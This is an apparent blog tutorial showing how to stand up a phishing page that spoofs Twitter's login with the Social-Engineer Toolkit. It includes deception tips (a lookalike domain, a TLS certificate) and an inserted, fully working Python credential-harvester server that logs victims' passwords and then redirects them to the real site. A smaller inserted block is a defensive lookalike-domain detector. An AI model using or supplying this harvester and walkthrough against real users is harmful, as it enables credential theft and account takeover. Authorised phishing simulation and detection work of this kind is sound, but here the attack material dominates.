DISCLAIMER: This post is intended for educational purposes only. Remember to always get written permission from your client before deploying this method outside of a lab environment and check your local laws.
Description
This is a very simple, yet powerful attack that spoofs a legitimate login page to capture credentials in minutes with the Social-Engineer Toolkit (SET). I use adaptations of this procedure to simulate phishing-style attacks for my clients, to show how easy a dangerous attack can be. The attack described in this post can literally be run in minutes by anyone with basic computer knowledge.
**Remember, the BEST defense against an attack like this is educating your clients' users to identify and report these kinds of events.**
Requirements
- Kali Linux – Download: https://www.kali.org/downloads/
Launch the Social-Engineer Toolkit (SET)
(I am assuming you have Kali Linux running and updated)
Open a new terminal window and enter: setoolkit
Launch the Credential Harvester Attack Method
Enter 1
to enter the “Social-Engineering Attacks”
Enter 2
to enter the “Website Attack Vectors”
Enter 3
to enter the “Credential Harvester Attack Method”
Enter 1
to enter the “Web Templates”
Note: From here you could also choose option 2 (Site Cloner) to clone an existing login page. SET is scary good at cloning login pages that have the "username" and "password" fields on the same page; multi-step logins (username first, password on a second page) do not clone cleanly.
You will be prompted to confirm the IP address for where the template will be hosted. Press <ENTER> to continue.
Note: This is the IP that your target would see and that the form will POST back to. If you are behind a NAT firewall or in the cloud and the target is external, use your public IP and forward inbound port 80 (the harvester's default) to the Kali host.
Select a pre-made template. For this example I am using option 3
and then press <RETURN> when prompted.
Executing the Attack
Point a web browser at the IP you entered (or accepted) when launching the attack. In my example I would enter: http://10.211.55.3
Looks pretty legit. It's an older-style template, but other than the raw IP in the address bar it could easily pass. To make it even more passable I could register a DNS name with "twitter" thrown in, such as twitter.subproject9.com. Since most browsers now flag non-HTTPS sites with a warning, I would also use a TLS certificate to make the page look more authentic.
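The lookalike hostname trick above (a brand name as a subdomain of an unrelated domain) is easy to catch on the defensive side. The following is an added example, not part of the original post and not SET's code: it flags hostnames that contain a brand token but whose registrable domain is not one the brand actually owns. The brand list, the sample URLs, and the two-label registrable-domain rule are all assumptions for illustration.

```python
# Added example (not from the original post): flag lookalike hostnames such as
# twitter.subproject9.com or login-twitter.com. The brand table and the
# constructed sample URLs below are assumptions, not data from the post.
from urllib.parse import urlsplit

# Assumption: a small table of brands and the registrable domains they own.
BRANDS = {
    "twitter": {"twitter.com", "x.com"},
    "paypal": {"paypal.com"},
}


def registrable_domain(host: str) -> str:
    """Return the last two labels of a hostname (example.com).
    Assumption: a two-label rule is good enough here; real deployments
    should use the Public Suffix List so co.uk-style suffixes are handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def lookalike_brand(host: str):
    """Return the brand a hostname appears to impersonate, or None.
    A host is only a lookalike when the brand token appears somewhere in the
    name but the registrable domain is not one the brand owns."""
    host_l = host.lower().rstrip(".")
    reg = registrable_domain(host_l)
    for brand, owned in BRANDS.items():
        if reg in owned:
            return None          # genuinely the brand's own domain (or a subdomain of it)
        if brand in host_l:
            return brand
    return None


def scan_urls(urls):
    """Return (url, brand) pairs for every URL whose host looks like a lookalike."""
    hits = []
    for url in urls:
        host = urlsplit(url).hostname or ""
        brand = lookalike_brand(host)
        if brand:
            hits.append((url, brand))
    return hits


if __name__ == "__main__":
    # Constructed sample: what a proxy log or a reported phishing mail might contain.
    sample = [
        "https://twitter.com/login",
        "https://api.twitter.com/1.1/",
        "http://twitter.subproject9.com/",
        "https://login-twitter.com/signin",
        "https://paypal.com.account-verify.example/",
        "http://10.211.55.3/",
    ]
    for url, brand in scan_urls(sample):
        print(f"LOOKALIKE [{brand}] {url}")
```

Run this over proxy or mail-gateway URLs and the "brand token on a foreign domain" pattern falls out directly; a raw IP such as the one used in this walkthrough is not flagged by this check, so pair it with a separate "login form on a bare IP" rule.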
What a Target Would See
The target would be presented with a seemingly valid login page, in this example Twitter's. The user would log in as normal.
Upon hitting "Sign in", the target's credentials are captured and the browser is redirected to the actual Twitter login page. The goal is to fool the target into thinking they mistyped their credentials or that something went wrong on Twitter's end. They log in again, get into Twitter, and no concerns or red flags are raised.
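To make the capture-then-redirect mechanic concrete, here is an added example that is not SET's code and not from the original post: a minimal listener that serves a stand-in login form, records whatever the form POSTs, and answers with a 302 to the real login page so the second attempt "just works". The form field names, the log file name, and the redirect target are assumptions for illustration (SET's own templates use their own field names and write their own report).

```python
# Added example (not SET's code): the mechanic behind the credential harvester.
# GET  -> serve a stand-in login form (constructed, not a SET template)
# POST -> record the submitted fields, then 302 to the real login page
import json
import sys
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

REAL_LOGIN_URL = "https://twitter.com/login"   # assumption: where the victim is sent afterwards
LOG_PATH = "harvester.log"                     # assumption: one JSON record per line

# Constructed stand-in page; field names are assumptions.
FAKE_PAGE = b"""<html><body><h1>Sign in</h1>
<form method="POST" action="/login">
  <input name="username" placeholder="Username or email">
  <input name="password" type="password" placeholder="Password">
  <button>Sign in</button>
</form></body></html>"""


def parse_credentials(body: bytes) -> dict:
    """Turn a URL-encoded POST body into {field: value}. Every field is kept,
    so a cloned form with unexpected names still gets logged in full."""
    parsed = parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def is_login_attempt(fields: dict) -> bool:
    """Heuristic: a submission with any password-looking field is a login attempt."""
    return any("pass" in name.lower() for name in fields)


def build_record(client_ip: str, user_agent: str, fields: dict, ts: float) -> dict:
    """The record the console and log file receive: who, from what, and what they typed."""
    return {"ts": ts, "ip": client_ip, "ua": user_agent,
            "login_attempt": is_login_attempt(fields), "fields": fields}


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.wfile.write(FAKE_PAGE)

    def do_POST(self):
        import time
        length = int(self.headers.get("Content-Length", "0"))
        fields = parse_credentials(self.rfile.read(length))
        record = build_record(self.client_address[0],
                              self.headers.get("User-Agent", ""), fields, time.time())
        line = json.dumps(record)
        with open(LOG_PATH, "a", encoding="utf-8") as fh:
            fh.write(line + "\n")
        print(line, file=sys.stderr, flush=True)      # real-time console view
        # Send the victim to the real site so the second login succeeds.
        self.send_response(HTTPStatus.FOUND)
        self.send_header("Location", REAL_LOGIN_URL)
        self.end_headers()


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080   # assumption: non-privileged port for the lab
    print(f"listening on http://0.0.0.0:{port}/ (Ctrl-C to stop)", file=sys.stderr)
    try:
        HTTPServer(("0.0.0.0", port), HarvesterHandler).serve_forever()
    except KeyboardInterrupt:
        pass
```

Two things worth noticing from the defensive side: the credentials travel in a plain form POST to a host that is not the brand's, and the very next response is a 302 to the brand's real login page. A web proxy log therefore shows "POST to unfamiliar host, immediately followed by GET of the real login page" from the same client, which is a reasonable hunting query on its own.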
Viewing the Captured Credentials
There are a few ways to view captured credentials.
First, through console logging. All activity on your credential-harvesting site is displayed in real time on the console. I have highlighted the credentials I entered into the fake Twitter site.
To exit the attack, press Ctrl-C
and a report will be generated in HTML and XML format.
All you have to do is browse to the folder listed in blue and open the HTML file to see the report.
That’s it!